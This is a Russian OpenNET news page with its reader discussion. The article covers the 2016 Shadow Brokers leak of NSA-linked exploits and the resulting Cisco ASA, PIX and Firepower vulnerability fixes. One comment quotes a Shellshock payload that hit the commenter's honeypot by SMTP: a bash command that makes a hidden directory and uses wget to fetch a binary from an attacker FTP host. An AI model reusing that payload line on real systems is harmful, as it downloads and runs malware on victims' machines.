The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

Серия уязвимостей в продуктах Cisco, выявленных после публикации эксплоитов АНБ

22.08.2016 10:28

Хакерская группа "Shadow Brokers" опубликовала архив, содержащий около 250 Мб файлов с различными эксплоитами и приложениями для совершения атак, по заявлению группы полученной в результате утечки информации из Агентства Национальной Безопасности США (АНБ). В основном эксплоиты направлены на создание закладок и совершение атак на оборудование Cisco PIX/ASA, Juniper Netscreen и Fortigate, как правило используя zero-day уязвимости.

Несмотря на то, что эксплоиты в основном касаются устаревшего и выведенного из эксплуатации оборудования, некоторые проблемы оказались актуальными и в настоящее время. В частности, по мотивам обнародованной информации компания Cisco устранила в своих продуктах несколько уязвимостей, позволяющих удалённо выполнить код на оборудовании Cisco. В том числе устранена критическая уязвимость (CVE-2016-1457), позволяющая получить доступ к интерфейсу Cisco Firepower Management Center и Cisco ASA 5500-X с сервисами FirePOWER с правами root без прохождения аутентификации через отправку специально оформленного HTTP-запроса. Другая проблема (CVE-2016-6366) в Cisco ASA, Cisco PIX и Cisco Firepower позволяет без авторизации выполнить код через отправку запроса по SNMP.

Что касается межсетевых экранов Cisco PIX, поддержка которых была прекращена в 2009 году, но которые по-прежнему применяются некоторыми отечественными провайдерами, в составе архива присутствовала утилита benigncertain, позволяющая удалённо извлечь закрытый ключ для произвольного IPsec-соединения. Суть атаки сводится к эксплуатации уязвимости, позволяющей через отправку специально оформленного IKE-пакета инициировать выход за границы буфера и в составе ответа получить часть системной памяти, в том числе содержащей закрытые RSA-ключи и конфиденциальные настройки. Указанная уязвимость проясняет методы, используемые для проведения атак АНБ на VPN, упомянутые в документах, несколько лет назад опубликованных Эдвардом Сноуденом. По оценке компании Cisco, уязвимость присутствует только в версиях Cisco PIX до выпуска 7.0.

Дополнение: Связанная с SNMP уязвимость оказалась применима к большему числу моделей Cisco ASA, чем предполагалось изначально. Модифицированный вариант атаки затрагивает прошивки 7.2, 8.0-8.7, 9.1-9.6.

  1. Главная ссылка к новости (http://arstechnica.com/securit...)
  2. OpenNews: Серьезная уязвимость в межсетевых экранах Cisco ASA
  3. OpenNews: Зафиксирована атака с подстановкой бэкдора в маршрутизаторы Cisco
  4. OpenNews: Компания Cisco представила Snort 3.0, систему предотвращения атак нового поколения
  5. OpenNews: В межсетевых экранах Juniper выявлен бэкдор с функциями расшифровки трафика VPN
  6. OpenNews: Возможность обхода проверки сертификатов в продуктах Juniper на базе JUNOS
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/45013-cisco
Ключевые слова: cisco
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (54) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (-), 10:57, 22/08/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • +20 +/
    cisco , juniper , fortigate, brocade ,extreme , все они сами создали эти дырки а теперь говорят клиентам , давай плати еще service что бы пофиксили, офигенный бизнес.
     
     
  • 2.2, Аноним (-), 11:12, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • –14 +/
    не стесняйтесь. Добавте в список RedHat, SuSe, Ubuntu, MariaDB.
    все они наделали дырок, а теперь хотят денег за поддержку и исправление ошибок.

    Почему вы их не упомянули?

     
     
  • 3.4, evkogan (?), 11:19, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +13 +/
    > Почему вы их не упомянули?

    Потому как ты можешь сам пофиксить пролему. Никто не мешает. А если тебе лень или умеия не хватает, то плати. Но возможность, то приутствует. И даже при закрытии фирмы производителя останется.

     
     
  • 4.7, aurved (?), 12:55, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +2 +/
    да и платить не надо, ubuntu с mariadb денег не просят, а еще есть centos и opensuse
     
  • 4.8, Аноним (-), 12:56, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Теоретически можно в снятой с поддержки циске пофиксить... а если тебе уменя не хватает, то не факт, что кто-то другой это сделает на нужном уровне.
     
     
  • 5.11, Аноним (-), 13:34, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +6 +/
    Ага, а образ поправленной прошивки тебе Аллах подпишет, чтоб чип жадности не превратил циску в тыкву?
     
     
  • 6.20, Аноним (-), 15:53, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • –6 +/
    > Ага, а образ поправленной прошивки тебе Аллах подпишет, чтоб чип жадности не
    > превратил циску в тыкву?

    Ну если ты не знаешь как сделать это, не значит что за твои деньги не сделает кто-то другой.
    Так мы же не твою жадность сейчас обсуждаем?

     
     
  • 7.28, Аноним (-), 17:11, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Ага, это зделает Васян с Бутово, аффтар твоего zvercd.
     
  • 7.36, IB (?), 19:23, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +/
    Неверно поставлен вопрос.
    За перепрошивку таки можно и присесть при неблагоприятных обстоятельствах.
    Заколебаешься fair-use доказвать и не дай бог кто-то увидел твою ломаную прошивку.
    DMCA он такой
     
  • 4.15, Del (?), 14:04, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >> Почему вы их не упомянули?
    > Потому как ты можешь сам пофиксить пролему. Никто не мешает. А если
    > тебе лень или умеия не хватает, то плати. Но возможность, то
    > приутствует. И даже при закрытии фирмы производителя останется.

    Ага, закрытые дрова тоже фиксить будете?

     
     
  • 5.19, Аноним (-), 15:52, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • –2 +/
    За твои деньги легко. вон kPatch фиксит нужное в памяти.

     
     
  • 6.27, Аноним (-), 17:07, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +/
    >> Ага, закрытые дрова тоже фиксить будете?
    > За твои деньги легко. вон kPatch фиксит бузину в огороде!

    fix. Не благодарите!


     
  • 2.3, evkogan (?), 11:16, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Я не уверен, что все эти дырки созданы намеренно. И при наличии гарантии они закроют их и без дополнительных денег. Вообще отдавать новые прошивки только при купленной тех. поддержке это плохо. Но когда поставить обновления вообще нельзя, потому как производитель давно закрылся и даже если готов заплатить, то некому, это гораздо хуже. А железка меожет быть и не особо старой.
     
     
  • 3.6, Аноним (-), 12:52, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Уровень разработчиков в циске сейчас настолько низкий, что реально большинство дыр могут быть сделаны по глупости. Циска сейчас - это филиал индийской компании.
     
     
  • 4.26, qwerty (??), 17:07, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • –3 +/
    > Циска сейчас - это филиал индийской компании.

    Это вам так хочется шоб было? =)

     
     
  • 5.29, Аноним (-), 17:15, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Я другой аноним, но побывав там, всё подтверждаю. Циска почти полностью состоит из индусов. Преимущественно из Бангалора. Притом это, не только разрабы, но и админперсонал. В таких гнилых условиях только они работать и могут.
     
     
  • 6.59, Аноним (-), 04:32, 24/08/2016 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Пепелацы все еще строят
     
  • 5.37, Аноним (-), 19:27, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Если не в курсе, то почти все новинки циски в последние годы - это тупо продукция только что целиком приобретённых компаний. Естественно после интеграции в циску со временем способности к разработке утрачиваются....
     
  • 3.34, . (?), 18:38, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > И при наличии гарантии они закроют их и без дополнительных денег.

    у циски нет гарантии. (точнее, есть на low end офисное оборудование, и такая, что лучше б не было)
    У циски есть только smartnet с TAC'ом, которому таки да, платят совершенно не за то (и на сравнительно современном железе ты без него далеко не уедешь - оно просто в один не очень отдаленный и совершенно непрекрасный день навернется без видимых причин, и ты так и будешь всю жизнь его перезагружать, даже не имея возможности понять, что именно вызывает проблему). То есть платят по умолчанию, а кроилово всегда вело к попадалову.

    Проблем с ним две: во-первых, не удастся поставить под него уже не обслуживаемое и при этом не абсолютно исправное оборудование (можно попытаться обмануть, особенно если проблема софтовая, но если у тебя там трояны кишат, уже может не выйти ;-)

    Вторая, и более главная - циска может выпускать патчи, ты их можешь даже посмотреть через дырочку в их веб-интерфейсе, но скачать тебе их не дадут. И задаром не дадут, и за деньги тоже. Потому что опа - твоему оборудованию пять лет назад вышел end of life. Получить на такое оборудование смартнет было можно - три года назад. Два года назад он кончился. А сегодня уже никак нельзя. Вот нету дырки для заноса денег.
    Те же пиксы тому пример.

     
     
  • 4.38, zanswer (?), 19:31, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +/
    Гарантия у них стандартная, один год, обновление IOS можно получить бесплатно, в случае наличия в текущем ошибок связанных с безопасностью.

    Использовать в 2016 году PIX, можно конечно, но нужно ли? В прочем, кого вы предлагаете взамен?

     
     
  • 5.48, . (?), 12:26, 23/08/2016 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Использовать в 2016 году PIX, можно конечно, но нужно ли?

    ну да, надо его выкинуть, и заплатить чемодан денег за асу, чтобы она выполняла ровно те же действия в том же мелкоофисе, который ни расти не будет, ни чего-то внутри у себя менять еще лет десять (помножив на полсотни тех мелкоофисов, получаем тех чемоданов уже грузовичок). Причем без всякой гарантии, что именно той версии асы, за которую ты заплатил чемодан, не настанет прямо через месяц EOL, и при следующей серьезной проблеме не придется снова все менять.
    Ну и результат налицо - мелкий и средний бизнес мигрирует на опенсорцные недоделки, крупный ставит не то что хорошо работает, а то что выиграло тендер, поскольку экспертиза ныне не в моде :-(
    Результат один и тот же - уменьшение хорошей конкуренции, заполнение рынка кривым и убогим опенсорсным софтом, который нет стимулов доделывать, ибо все остальное либо еще хуже, либо безумно дорого.

    Что до использования пиксов в 2016м году - напоминаю, тут речь о его использовании в качестве vpn-сервиса, ну и что у нас опенсорсного умеет совместимый с окружающими ipsec, с работающим автоматическим nat-t? А если чуть усложним задачу - спарка двух пиксов в active/passive failover? Да, оно такое могет, привет из 2002го года ;-)

     
     
  • 6.49, zanswer (?), 12:41, 23/08/2016 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Не понял, так что нужно выбрать взамен Cisco с их не последовательной политикой?
     
     
  • 7.56, Led (ok), 22:58, 23/08/2016 [^] [^^] [^^^] [ответить]  
  • +/
    > Не понял, так что нужно выбрать взамен Cisco с их не последовательной
    > политикой?
    > не последовательной

    Выбирай Розенталя

     
  • 2.41, Онаним (?), 03:05, 23/08/2016 [^] [^^] [^^^] [ответить]  
  • –1 +/
    А есть какие-то открытые альтернативы? Типа одноплатные компы с десятками Ethernet-интерфейсов на боту, на котрые можно поставить Linux/Фряху/итп. и нормально самому поддерживать (ну, не без помощи сообщества, разумеется), в т.ч. самому перекомпилировать ведро и всё такое?
     
     
  • 3.42, zanswer (?), 07:41, 23/08/2016 [^] [^^] [^^^] [ответить]  
  • +/
    И самое главное, с конкурентным BPS/PPS/CPS/MCC, иначе куда его ставить, весь такой открытый и не способный выполнять поставленную задачу.
     
     
  • 4.47, Andrey Mitrofanov (?), 12:08, 23/08/2016 [^] [^^] [^^^] [ответить]  
  • +/
    > И самое главное, с конкурентным BPS/PPS/CPS/MCC, иначе куда его ставить, весь такой
    > открытый и не способный выполнять поставленную задачу.

    Альтернатива есть. И это Сискоу! Если верить интерпретации массовых увольнений жёлтой бузинес прессой:

    [I]Cisco Cuts Workforce by 7% to Speed Transition to Software

    Ian King | Bloomberg

    Cisco Systems Inc., the biggest maker of equipment that runs the internet, plans
    to cut about 7 percent of its workforce, trying to recast itself as a provider
    of software-based systems and services.

    read more
    < http://thevarguy.com/var-guy/cisco-cuts-workforce-7-speed-transition-software >[/I]

     
     
  • 5.50, zanswer (?), 12:43, 23/08/2016 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Не вижу где вы ссылку на OpenSource решение приложили, с Cisco то всё ясно.
     
     
  • 6.52, Andrey Mitrofanov (?), 13:18, 23/08/2016 [^] [^^] [^^^] [ответить]  
  • +/
    > Не вижу где вы ссылку на OpenSource решение

    Её там и нет. Наверное, я неправильно прочитал вопрос, как "хочу, чтоб всё совсем как сискоу, но ещё и...". Виноват.  //OpenWRT не предлагаю, на их сайт не нашёл запрошенного Вами трёхбуквенного супа.

     
     
  • 7.54, zanswer (?), 14:02, 23/08/2016 [^] [^^] [^^^] [ответить]  
  • –1 +/
    OpenWRT не делает железо насколько я знаю, может быть я ошибаюсь конечно. Речь идёт о том, чем заменить Cisco/Juniper/Fortigate и прочих, которые строят свои ОС сейчас, на базе Linux, чтобы замена выполняла поставленную задачу.

    А то, что у Cisco и прочих проприетарных производителей, есть минусы, никто по-моему не сомневается, но замены то нет.

     
     
  • 8.57, Led (ok), 22:59, 23/08/2016 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ты ещё скажи, что тебе замены нет ... текст свёрнут, показать
     
     
  • 9.60, zanswer (?), 06:26, 24/08/2016 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Не вижу ваших предложений, чем их заменить ... текст свёрнут, показать
     
  • 3.45, Слава (??), 11:18, 23/08/2016 [^] [^^] [^^^] [ответить]  
  • +/
    Дайте угадаю,вы же не айтишник?
    https://www.alibaba.com/showroom/mini--itx-motherboard-for-6-lan.html
    да и промышленные 12-портовики есть
    это так на вскидку,а можно еще карточек разных навешать от wifi до 4G
    я эти конструкторы под задачи параноиков каждый божий день собираю
     
     
  • 4.51, zanswer (?), 12:44, 23/08/2016 [^] [^^] [^^^] [ответить]  
  • –1 +/
    И как оно в сравнение с чем-то материальным, что обычно ставят в стойки, с какой моделью Cisco ASA или Juniper SRX, можно сравнить это?


     
     
  • 5.53, Слава (??), 13:29, 23/08/2016 [^] [^^] [^^^] [ответить]  
  • +/
    Сравнивать глупо потому что разное назначение. Это же способ получить рабочий канал для локалки в любой жопе мира-есть lan будет по проводу гнать,есть wifi/adsl/4G/gprs будет по нему. После того как агрегирование сделали вообще всё хорошо стало. По программной части в целом самододел распространенных решений-нормально,учитывая незначительное число подключений. Да и использование openlinksys свой результат дает-по безопасности и качеству линка нареканий нет.
    Спрос на железки стабильный:в основном телевизионщики и журналисты на передвижные аппаратки. Аналоги фирменные от 600 тысяч начинаются, мы в 4 раза дешевле гоним.
     
     
  • 6.55, zanswer (?), 14:04, 23/08/2016 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Здорово! Интересное решение у вас в своём классе устройств, я просто не туда его всунул,  после вашего разъяснения, согласен, что мой вопрос не корректен.
     
  • 3.58, Anonymous1 (?), 01:16, 24/08/2016 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > А есть какие-то открытые альтернативы? Типа одноплатные компы с десятками Ethernet-интерфейсов
    > на боту, на котрые можно поставить Linux/Фряху/итп. и нормально самому поддерживать
    > (ну, не без помощи сообщества, разумеется), в т.ч. самому перекомпилировать ведро
    > и всё такое?

    А зачем? Возьмите комп, объедините со свитчем, умеющим VLAN, и имейте до 4096 сетевых интерфейсов (теоретически, разумеется). Правда, реально получится до 8 гигабитных интерфейсов при 10G сетевой плате, либо до 8 100-мб интерфейсов на гигабитной сетевой плате... Десятки гигабитных интерфейсов коммутировать без прямой работы через ASIC не получится в любом случае...

     

  • 1.5, Аноним (-), 11:49, 22/08/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    к гадалке не ходи что и анб и циско знали об этих якобы уязвимостей
    НО теперь об этом знают ВРАГИ поэтому придется закрыть
    УХАХА
     
  • 1.9, aurved (?), 12:58, 22/08/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Больше взломов АНБ, хороших и разных)))
     
  • 1.10, Аноним (-), 13:08, 22/08/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Я уверен, что даже в линуксе полно бэкдоров позволяющих залезть если надо
     
     
  • 2.13, Аноним (-), 13:39, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +/
    Ага, просто там так много кода, что лень заморачиваться искать. :)
     
     
  • 3.61, Аноним (-), 01:10, 25/08/2016 [^] [^^] [^^^] [ответить]  
  • +/
    > Ага, просто там так много кода, что лень заморачиваться искать. :)

    Стопудово.

     
  • 2.17, Yuka (ok), 14:24, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • –1 +/
    https://www.opennet.ru/opennews/art.shtml?num=37947
     

  • 1.12, Аноним (-), 13:38, 22/08/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    SUSE Enterprise Desktop 11, пробный 60-дневный период, все обновления установлены. Произошла такая фигня. Нужно было отправить биткойны. Скачал клиент, как ни странно "strings bitcoin-qt | grep LIB" сообщил что системного GLIBC хватает. Сделал симлинк ~/.bitcoin на внешний хард. Включил, подождал полчаса пока снихронизируется, отправил, отключил.

    После перезагрузки комп "обрадовал" меня тем, что не удалось отобразить кол-во неудачных логинов - файл "lastb" удалён. Круто. Кто-то увидел новый айпишник, подключающийся к сети биткойн, и ломанул 9возможно автоматически)? У меня хоть и белый IP, но Firewall включен, а SSH - напротив - нет.

     
     
  • 2.21, PnDx (ok), 16:23, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Чего-то в этой истории не хватает…
    "Скачал клиент" https://bitcoin.org/ru/download
    там нет rpm, насколько (не)вижу. Т.е., скачана чья-то левая сборка (вывод такой, раз "собрал" в тексте не фигурирует, а сразу "strings"). Дальше рассказывать?
     
     
  • 3.24, commiethebeastie (ok), 16:33, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > Чего-то в этой истории не хватает…
    > "Скачал клиент" https://bitcoin.org/ru/download
    > там нет rpm, насколько (не)вижу. Т.е., скачана чья-то левая сборка (вывод такой,
    > раз "собрал" в тексте не фигурирует, а сразу "strings"). Дальше рассказывать?

    Это вшивый серверную с баней перепутал.

     
  • 3.31, Аноним (-), 17:36, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Это был официальный tar.xz, распакованный в /home/username. Почему ты считаешь, что RPM-ка оттуда же была бы безопаснее?
     
     
  • 4.32, anonXYZ (?), 17:54, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +/
    не неси чушь. ОФициальный blob bitcoin core в архиве ..tar.gz всегда идет.
    sha1sum
    d215d582aec707d2dc208b61d4442def8e08268b  bitcoin-0.12.1-linux32.tar.gz
    156b897c6c7d1f12587d72ea92ccaf28dccedd55  bitcoin-0.12.1-linux64.tar.gz

     
     
  • 5.33, PnDx (ok), 18:15, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >  sha1sum
    >  d215d582aec707d2dc208b61d4442def8e08268b  bitcoin-0.12.1-linux32.tar.gz
    >  156b897c6c7d1f12587d72ea92ccaf28dccedd55  bitcoin-0.12.1-linux64.tar.gz

    ? Не поленился сходить на официалку, там подписанные sha256. Т.е. врукопашную качаем asc → проверяем подпись → качаем .tar.gz → проверяем сумму.
    Наличие поддерживаемого репо сводит эти шаги к исходной проверке сигнатуры репозитория.
    В описанном выше случае с высокой долей вероятности был применён виндо-подход "скачал-запустил", возможно даже из-под рута (т.к. логи "вдруг" не исчезают).

    ** Тут ко мне в "ловушку" прилетело по smtp:
    To:() { :; }; /bin/bash -c "mkdir /var/.udp; wget ftp://ftp.ugotownedz.org/Xorg -O /var/.udp/Xorg;…
    ну и т.д., в конце хамство с затиркой всего подряд.  Таки не понял, это что за почтовик шелл из-под рута дёргает? Судя по наличию робота, явление сравнительно массовое?

     
     
  • 6.39, ram_scan (?), 21:15, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +/
    С разморозкой ;) Этой дырище уже наверное второй год пошел...
     
  • 3.35, . (?), 18:48, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > Чего-то в этой истории не хватает…
    > "Скачал клиент" https://bitcoin.org/ru/download
    > там нет rpm, насколько (не)вижу. Т.е., скачана чья-то левая сборка (вывод такой,

    ну да, современные опенсорсные обезьянки как не видят rpm - сразу плачут, и бегут собирать из исходника.

    > раз "собрал" в тексте не фигурирует, а сразу "strings"). Дальше рассказывать?

    да, расскажите нам - что за нёх качается с https://bitcoin.org/bin/bitcoin-core-0.12.1/bitcoin-0.12.1-linux64.tar.gz ? Нет, это ни разу не исходник. Который вы тоже ни разу не верифицировали, так что неизвестно, чем он лучше, если берется с того же сайта.

    Ну а что товарищ использует стрингс вместо ldd, это да, печаль (но более безопасно ;-) , как и то что видимо правда работает от рута - вряд ли в актуальной и патченной sel можно нахаляву далеко уехать просто с метасплойтом (хотя, конечно, главное выбрать момент). А вот никакой защиты от дураков, типа принудительного отучения пользователей работать рутом и подсовывания им sudo, там действительно нет, это энтерпрайз дистрибутив, предполагается, что либо он стоит за периметром, либо им занимаются грамотные инженеры.

    Интересно, его биткойновый кошелечек - тигидам, или можно еще успеть к дербану? ;-)

     
  • 2.30, Аноним (-), 17:17, 22/08/2016 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Хакни их в отместку CODE echo 124 - 124 - C 124 124 3 - C 124 ... большой текст свёрнут, показать
     

  • 1.43, odity (ok), 08:42, 23/08/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Зашибись. первый архив отекрыл, а за файлы они хотят деньги. ну засранцы. ну, буду первый мучать.изучать.
     
  • 1.44, John (??), 09:03, 23/08/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    А сколько их там ещё....
    Неудивительно для конторы, которая даже стандартов TCP/IP не знает
    https://supportforums.cisco.com/discussion/10014991/icmp-host-unreachable
     
  • 1.46, Andrey Mitrofanov (?), 12:01, 23/08/2016 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    >> Хакерская группа "Equation Group" [2016/08/16/[B]equationgroup-tool-leak[/B]-extrabacon-demo/ опубликовала] архив, содержащий около 250 Мб файлов

    Если чтение URL-а под словом "опубликовала" не навело автора новости на мысли, что этт не "она", гхрупп, а "её", гхруппу, по-публиковали, то... я приведу ещё упражнение в иностранном для наших Авторов:

    [I]Security News for the Week of August 15, 2016

    Among the growing number of major organizations getting hacked these days, we can now add the National Security Agency (NSA) to the list. Well, sort of. This week, the NSA was reportedly targeted [U]by a group of hackers who call themselves the Shadow Brokers[/U]. On Saturday, the “shady” crew released a series of files containing malware and attack [U]code developed by the NSA-associated team, Equation Group[/U]. --http://thevarguy.com/network-security-and-data-protection-software-solutions/ [/I]

     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру